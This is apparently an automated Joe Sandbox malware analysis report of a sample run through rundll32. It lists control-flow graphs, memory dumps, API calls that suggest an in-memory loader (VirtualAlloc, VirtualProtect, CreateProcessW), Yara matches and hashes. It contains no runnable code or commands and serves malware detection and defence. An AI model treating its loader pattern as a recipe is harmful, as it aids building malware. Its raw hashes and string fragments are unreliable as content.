                                                                      control_flow_graph 0 230423b0000-230423b0460 call 230423b0aa8 * 2 VirtualAlloc 22 230423b048a-230423b0494 0->22 23 230423b0462-230423b0466 0->23 26 230423b049a-230423b049e 22->26 27 230423b0a91-230423b0aa6 22->27 24 230423b0468-230423b0488 23->24 24->22 24->24 26->27 28 230423b04a4-230423b04a8 26->28 28->27 29 230423b04ae-230423b04b2 28->29 29->27 30 230423b04b8-230423b04bf 29->30 30->27 31 230423b04c5-230423b04d2 30->31 31->27 32 230423b04d8-230423b04e1 31->32 32->27 33 230423b04e7-230423b04f4 32->33 33->27 34 230423b04fa-230423b0507 33->34 35 230423b0509-230423b0511 34->35 36 230423b0531-230423b0567 GetNativeSystemInfo 34->36 37 230423b0513-230423b0518 35->37 36->27 38 230423b056d-230423b0589 VirtualAlloc 36->38 39 230423b051a-230423b051f 37->39 40 230423b0521 37->40 41 230423b058b-230423b059e 38->41 42 230423b05a0-230423b05ac 38->42 43 230423b0523-230423b052f 39->43 40->43 41->42 44 230423b05af-230423b05b2 42->44 43->36 43->37 46 230423b05c1-230423b05db 44->46 47 230423b05b4-230423b05bf 44->47 48 230423b061b-230423b0622 46->48 49 230423b05dd-230423b05e2 46->49 47->44 51 230423b06db-230423b06e2 48->51 52 230423b0628-230423b062f 48->52 50 230423b05e4-230423b05ea 49->50 53 230423b060b-230423b0619 50->53 54 230423b05ec-230423b0609 50->54 56 230423b06e8-230423b06f9 51->56 57 230423b0864-230423b086b 51->57 52->51 55 230423b0635-230423b0642 52->55 53->48 53->50 54->53 54->54 55->51 60 230423b0648-230423b064f 55->60 61 230423b0702-230423b0705 56->61 58 230423b0871-230423b087f 57->58 59 230423b0917-230423b0929 57->59 64 230423b090e-230423b0911 58->64 62 230423b092f-230423b0937 59->62 63 230423b0a07-230423b0a1a 59->63 65 230423b0654-230423b0658 60->65 66 230423b06fb-230423b06ff 61->66 67 230423b0707-230423b070a 61->67 69 230423b093b-230423b093f 62->69 90 230423b0a1c-230423b0a27 63->90 91 230423b0a40-230423b0a4a 63->91 64->59 68 230423b0884-230423b08a9 64->68 70 230423b06c0-230423b06ca 65->70 66->61 71 
230423b0788-230423b078e 67->71 72 230423b070c-230423b071d 67->72 95 230423b08ab-230423b08b1 68->95 96 230423b0907-230423b090c 68->96 75 230423b09ec-230423b09fa 69->75 76 230423b0945-230423b095a 69->76 73 230423b065a-230423b0669 70->73 74 230423b06cc-230423b06d2 70->74 78 230423b0794-230423b07a2 71->78 77 230423b071f-230423b0720 72->77 72->78 86 230423b066b-230423b0678 73->86 87 230423b067a-230423b067e 73->87 74->65 82 230423b06d4-230423b06d5 74->82 75->69 88 230423b0a00-230423b0a01 75->88 84 230423b097b-230423b097d 76->84 85 230423b095c-230423b095e 76->85 89 230423b0722-230423b0784 77->89 80 230423b07a8 78->80 81 230423b085d-230423b085e 78->81 92 230423b07ae-230423b07d4 80->92 81->57 82->51 100 230423b097f-230423b0981 84->100 101 230423b09a2-230423b09a4 84->101 97 230423b096e-230423b0979 85->97 98 230423b0960-230423b096c 85->98 99 230423b06bd-230423b06be 86->99 102 230423b068c-230423b0690 87->102 103 230423b0680-230423b068a 87->103 88->63 89->89 104 230423b0786 89->104 105 230423b0a38-230423b0a3e 90->105 93 230423b0a7b-230423b0a8e 91->93 94 230423b0a4c-230423b0a54 91->94 127 230423b07d6-230423b07d9 92->127 128 230423b0835-230423b0839 92->128 93->27 94->93 107 230423b0a56-230423b0a79 RtlAddFunctionTable 94->107 116 230423b08bb-230423b08c8 95->116 117 230423b08b3-230423b08b9 95->117 96->64 108 230423b09be-230423b09bf 97->108 98->108 99->70 109 230423b0989-230423b098b 100->109 110 230423b0983-230423b0987 100->110 114 230423b09ac-230423b09bb 101->114 115 230423b09a6-230423b09aa 101->115 112 230423b0692-230423b06a3 102->112 113 230423b06a5-230423b06a9 102->113 111 230423b06b6-230423b06ba 103->111 104->78 105->91 106 230423b0a29-230423b0a35 105->106 106->105 107->93 122 230423b09c5-230423b09cb 108->122 109->101 120 230423b098d-230423b098f 109->120 110->108 111->99 112->111 113->99 121 230423b06ab-230423b06b3 113->121 114->108 115->108 124 230423b08ca-230423b08d1 116->124 125 230423b08d3-230423b08e5 116->125 123 230423b08ea-230423b08fe 117->123 129 230423b0999-230423b09a0 
120->129 130 230423b0991-230423b0997 120->130 121->111 131 230423b09d9-230423b09e9 VirtualProtect 122->131 132 230423b09cd-230423b09d3 122->132 123->96 138 230423b0900-230423b0905 123->138 124->124 124->125 125->123 133 230423b07db-230423b07e1 127->133 134 230423b07e3-230423b07f0 127->134 135 230423b083b 128->135 136 230423b0844-230423b0850 128->136 129->122 130->108 131->75 132->131 139 230423b0812-230423b082c 133->139 140 230423b07fb-230423b080d 134->140 141 230423b07f2-230423b07f9 134->141 135->136 136->92 142 230423b0856-230423b0857 136->142 138->95 139->128 144 230423b082e-230423b0833 139->144 140->139 141->140 141->141 142->81 144->127
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.447100170.00000230423B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230423B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_230423b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: f5bcda5d924748d65e8d66526c93d536a49fd73dcea2af9d60bab82818ee0022
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: 9C72FA30618B488BDB59DF18C8997B9BBF4FB98305F10462DE9CAC3251EB34E641CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 442 180001bdc-180001cab call 1800142a0 445 180001d21-180001d64 CreateProcessW 442->445 446 180001cad-180001d1b call 18000dd70 442->446 446->445
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: :}
                                                                      • API String ID: 963392458-2902022129
                                                                      • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                      • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                      • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                      • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:10.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:11
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 3264 28dc9d10000 3265 28dc9d10183 3264->3265 3266 28dc9d1043e VirtualAlloc 3265->3266 3270 28dc9d10462 3266->3270 3267 28dc9d10a7b 3268 28dc9d10531 GetNativeSystemInfo 3268->3267 3269 28dc9d1056d VirtualAlloc 3268->3269 3274 28dc9d1058b 3269->3274 3270->3267 3270->3268 3271 28dc9d10a00 3271->3267 3272 28dc9d10a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 28dc9d109d9 VirtualProtect 3273->3274 3274->3271 3274->3273 3274->3274

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 28dc9d10000-28dc9d10460 call 28dc9d10aa8 * 2 VirtualAlloc 22 28dc9d10462-28dc9d10466 0->22 23 28dc9d1048a-28dc9d10494 0->23 24 28dc9d10468-28dc9d10488 22->24 26 28dc9d10a91-28dc9d10aa6 23->26 27 28dc9d1049a-28dc9d1049e 23->27 24->23 24->24 27->26 28 28dc9d104a4-28dc9d104a8 27->28 28->26 29 28dc9d104ae-28dc9d104b2 28->29 29->26 30 28dc9d104b8-28dc9d104bf 29->30 30->26 31 28dc9d104c5-28dc9d104d2 30->31 31->26 32 28dc9d104d8-28dc9d104e1 31->32 32->26 33 28dc9d104e7-28dc9d104f4 32->33 33->26 34 28dc9d104fa-28dc9d10507 33->34 35 28dc9d10531-28dc9d10567 GetNativeSystemInfo 34->35 36 28dc9d10509-28dc9d10511 34->36 35->26 38 28dc9d1056d-28dc9d10589 VirtualAlloc 35->38 37 28dc9d10513-28dc9d10518 36->37 39 28dc9d10521 37->39 40 28dc9d1051a-28dc9d1051f 37->40 41 28dc9d105a0-28dc9d105ac 38->41 42 28dc9d1058b-28dc9d1059e 38->42 44 28dc9d10523-28dc9d1052f 39->44 40->44 43 28dc9d105af-28dc9d105b2 41->43 42->41 45 28dc9d105c1-28dc9d105db 43->45 46 28dc9d105b4-28dc9d105bf 43->46 44->35 44->37 48 28dc9d105dd-28dc9d105e2 45->48 49 28dc9d1061b-28dc9d10622 45->49 46->43 50 28dc9d105e4-28dc9d105ea 48->50 51 28dc9d10628-28dc9d1062f 49->51 52 28dc9d106db-28dc9d106e2 49->52 53 28dc9d105ec-28dc9d10609 50->53 54 28dc9d1060b-28dc9d10619 50->54 51->52 55 28dc9d10635-28dc9d10642 51->55 56 28dc9d10864-28dc9d1086b 52->56 57 28dc9d106e8-28dc9d106f9 52->57 53->53 53->54 54->49 54->50 55->52 60 28dc9d10648-28dc9d1064f 55->60 58 28dc9d10871-28dc9d1087f 56->58 59 28dc9d10917-28dc9d10929 56->59 61 28dc9d10702-28dc9d10705 57->61 64 28dc9d1090e-28dc9d10911 58->64 62 28dc9d1092f-28dc9d10937 59->62 63 28dc9d10a07-28dc9d10a1a 59->63 65 28dc9d10654-28dc9d10658 60->65 66 28dc9d10707-28dc9d1070a 61->66 67 28dc9d106fb-28dc9d106ff 61->67 69 28dc9d1093b-28dc9d1093f 62->69 81 28dc9d10a40-28dc9d10a4a 63->81 82 28dc9d10a1c-28dc9d10a27 63->82 64->59 68 28dc9d10884-28dc9d108a9 64->68 70 28dc9d106c0-28dc9d106ca 65->70 71 
28dc9d10788-28dc9d1078e 66->71 72 28dc9d1070c-28dc9d1071d 66->72 67->61 101 28dc9d10907-28dc9d1090c 68->101 102 28dc9d108ab-28dc9d108b1 68->102 78 28dc9d10945-28dc9d1095a 69->78 79 28dc9d109ec-28dc9d109fa 69->79 76 28dc9d1065a-28dc9d10669 70->76 77 28dc9d106cc-28dc9d106d2 70->77 74 28dc9d10794-28dc9d107a2 71->74 73 28dc9d1071f-28dc9d10720 72->73 72->74 80 28dc9d10722-28dc9d10784 73->80 83 28dc9d1085d-28dc9d1085e 74->83 84 28dc9d107a8 74->84 89 28dc9d1067a-28dc9d1067e 76->89 90 28dc9d1066b-28dc9d10678 76->90 77->65 85 28dc9d106d4-28dc9d106d5 77->85 87 28dc9d1095c-28dc9d1095e 78->87 88 28dc9d1097b-28dc9d1097d 78->88 79->69 91 28dc9d10a00-28dc9d10a01 79->91 80->80 96 28dc9d10786 80->96 99 28dc9d10a4c-28dc9d10a54 81->99 100 28dc9d10a7b-28dc9d10a8e 81->100 97 28dc9d10a38-28dc9d10a3e 82->97 83->56 98 28dc9d107ae-28dc9d107d4 84->98 85->52 103 28dc9d1096e-28dc9d10979 87->103 104 28dc9d10960-28dc9d1096c 87->104 92 28dc9d1097f-28dc9d10981 88->92 93 28dc9d109a2-28dc9d109a4 88->93 94 28dc9d10680-28dc9d1068a 89->94 95 28dc9d1068c-28dc9d10690 89->95 105 28dc9d106bd-28dc9d106be 90->105 91->63 109 28dc9d10983-28dc9d10987 92->109 110 28dc9d10989-28dc9d1098b 92->110 114 28dc9d109a6-28dc9d109aa 93->114 115 28dc9d109ac-28dc9d109bb 93->115 111 28dc9d106b6-28dc9d106ba 94->111 112 28dc9d10692-28dc9d106a3 95->112 113 28dc9d106a5-28dc9d106a9 95->113 96->74 97->81 106 28dc9d10a29-28dc9d10a35 97->106 127 28dc9d107d6-28dc9d107d9 98->127 128 28dc9d10835-28dc9d10839 98->128 99->100 107 28dc9d10a56-28dc9d10a79 RtlAddFunctionTable 99->107 100->26 101->64 116 28dc9d108b3-28dc9d108b9 102->116 117 28dc9d108bb-28dc9d108c8 102->117 108 28dc9d109be-28dc9d109bf 103->108 104->108 105->70 106->97 107->100 124 28dc9d109c5-28dc9d109cb 108->124 109->108 110->93 122 28dc9d1098d-28dc9d1098f 110->122 111->105 112->111 113->105 123 28dc9d106ab-28dc9d106b3 113->123 114->108 115->108 125 28dc9d108ea-28dc9d108fe 116->125 118 28dc9d108d3-28dc9d108e5 117->118 119 28dc9d108ca-28dc9d108d1 117->119 118->125 119->118 
119->119 129 28dc9d10991-28dc9d10997 122->129 130 28dc9d10999-28dc9d109a0 122->130 123->111 131 28dc9d109cd-28dc9d109d3 124->131 132 28dc9d109d9-28dc9d109e9 VirtualProtect 124->132 125->101 138 28dc9d10900-28dc9d10905 125->138 134 28dc9d107e3-28dc9d107f0 127->134 135 28dc9d107db-28dc9d107e1 127->135 136 28dc9d10844-28dc9d10850 128->136 137 28dc9d1083b 128->137 129->108 130->124 131->132 132->79 140 28dc9d107f2-28dc9d107f9 134->140 141 28dc9d107fb-28dc9d1080d 134->141 139 28dc9d10812-28dc9d1082c 135->139 136->98 142 28dc9d10856-28dc9d10857 136->142 137->136 138->102 139->128 144 28dc9d1082e-28dc9d10833 139->144 140->140 140->141 141->139 142->83 144->127
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.444089664.0000028DC9D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000028DC9D10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_28dc9d10000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: 7cd35fe6a21c11b9ee20d057a10bd13971793a2dfa5c4dbb7e75c065fae65a47
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: 98722A35519B48CBDB58EF18C8897B9B7E0FB94315F10822EE88AD3282DF34D545CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                      • API String ID: 0-464535774
                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                      • API String ID: 0-3528011396
                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                      • API String ID: 0-3036092626
                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (figure not reproduced)
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +#;)$K'$sf$w\H
                                                                      • API String ID: 0-1051058546
                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <4P$<8$<w.
                                                                      • API String ID: 0-1030867500
                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                      • API String ID: 0-2447245168
                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                      • API String ID: 0-2100131636
                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                      • API String ID: 0-2401169580
                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                      • API String ID: 0-1318892062
                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
